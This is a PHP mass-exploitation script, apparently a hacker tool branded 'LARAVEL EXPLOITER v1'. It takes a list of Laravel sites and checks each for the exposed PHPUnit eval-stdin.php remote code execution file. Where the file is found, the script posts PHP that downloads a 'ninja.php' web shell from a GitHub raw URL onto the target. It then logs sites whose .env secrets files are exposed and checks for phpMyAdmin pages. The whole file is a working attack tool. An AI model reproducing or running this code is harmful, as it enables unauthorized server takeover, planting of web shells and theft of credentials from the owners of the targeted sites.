<?php
error_reporting(0);
#LARAVEL EXPLOITER v1#
# BY FB/www.zeldin.go.id [ SECURITY GHOST ] #
define("SAVED_FILE", "envscanner".uniqid().".txt");
function test($site, $test = 1){
	switch($test){
		case 1 :
			$postFields = "<?php echo('vuln'); ?>";
			break;
		case 2 :
			$postFields = "<?php copy('https://raw.githubusercontent.com/rintod/ninja/master/ninja.php', 'ninja.php'); ?>";
			break;
		case 3 :
			$postFields = "<?php file_put_contents('ninja.php', 'https://raw.githubusercontent.com/rintod/ninja/master/ninja.php'); ?>";
			break;
		default :
			$postFields = "<?php copy('https://raw.githubusercontent.com/rintod/ninja/master/ninja.php', 'ninja.php'); ?>";
			break;
	} 
	$ch = curl_init();
	$options = array(
		CURLOPT_URL => $site,
		CURLOPT_RETURNTRANSFER => true,
		CURLOPT_POST => true,
		CURLOPT_POSTFIELDS => $postFields, 
		CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
		CURLOPT_SSL_VERIFYPEER => false,
		CURLOPT_SSL_VERIFYHOST => false,
		CURLOPT_CONNECTTIMEOUT => 7,
		CURLOPT_TIMEOUT => 7
	);
	curl_setopt_array($ch, $options);
	return curl_exec($ch);
}
function get_http_response_code($domain1) {
  $headers = get_headers($domain1);
  return substr($headers[0], 9, 3);
}
function env($site){
	preg_match('#(.*)vendor#si', $site, $url);
	$check = get_http_response_code($url[1].".env");
	return $check;
}
function uri($site){
	preg_match('#(.*?)vendor#si', $site, $url);
	return $url;
}
echo "# LIST : "; $flist = trim(fgets(STDIN));
if(!is_file($flist) || !file_exists($flist)){
	die("No url file list\n");
}
$list = explode("\r\n", file_get_contents($flist));
foreach($list as $key => $target){
	if(strlen($target) > 0 && strpos($target, 'vendor')){
		$site = explode('/', $target)[2];
		echo ">>>>>>>>>> START [ ".$key." ] EXPLOITER <<<<<<<<<\n";
		echo "\t>> TARGET : ".$site."\n";
		echo "\t>> SCANNING TARGET HAS AN RCE FILE OR NOT : ";
		if(get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php") == 200){
			echo "{!} RCE FILE AVAILABLE {!}\n";
			echo "\t{!} START TESTING {!} \n";
			sleep(2);
			echo "\t>> TESTING VULN MESSAGE\n";
			echo "\t>> RESULT : ";
			if(test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 1) == "vuln"){
				echo "VULN\n";
				echo "\t>> SITE SHELL CHECK : ".uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php"."\n";
				echo "\t>> TESTING WITH COPY EXTENSION WEBSHELL & CHECK\n";
				test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 2);
				echo "\t>> HTTP CODE : ".get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php")."\n";
				echo "\t>> TESTING WITH FILE PUT CONTENTS FUNCTION & CHECK\n";
				test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 3);
				echo "\t>> HTTP CODE : ".get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php")."\n";
			}else{
				echo "NOT VULN\n";
			}		
		}else{
			echo "{~} RCE FILE NOT AVAILABLE {~}\n";
		}
		echo "\t>> CHECK HAS A ENV FILE OR NOT\n";
	 	preg_match('#(.*)vendor#si', $target, $url);
	 	echo "\t>> ENV CHECK URL : ".$url[1].".env\n";
	 	echo "\t>> RESULT : ";
	 	if(env($target) == "200"){
	 		file_put_contents(SAVED_FILE, $url[1].".env\n", FILE_APPEND);
			echo $site." [ HAS ENV ]\n";
			echo "\t>> CHECK PHPMYADMIN PAGE : ";
			echo get_http_response_code("http://".$site."/phpmyadmin/") == "200" ? "HAS PHPMYADMIN PAGE\n" : "PHPMYADMIN PAGE NOT FOUND\n";
		}else{
			echo $site." [ ENV NOT FOUND ]\n";
		}
		echo ">>>>>>>>>>>>>>>>>>> DONE <<<<<<<<<<<<<<<<<<<\n\n";
	}else{
		$site = explode('/', $target)[2];
		echo ">> SKIPPING SITE : ".$site." ~ REASON : VENDOR URL NOT DETECTED.\n";
	}
	sleep(1);
}
?>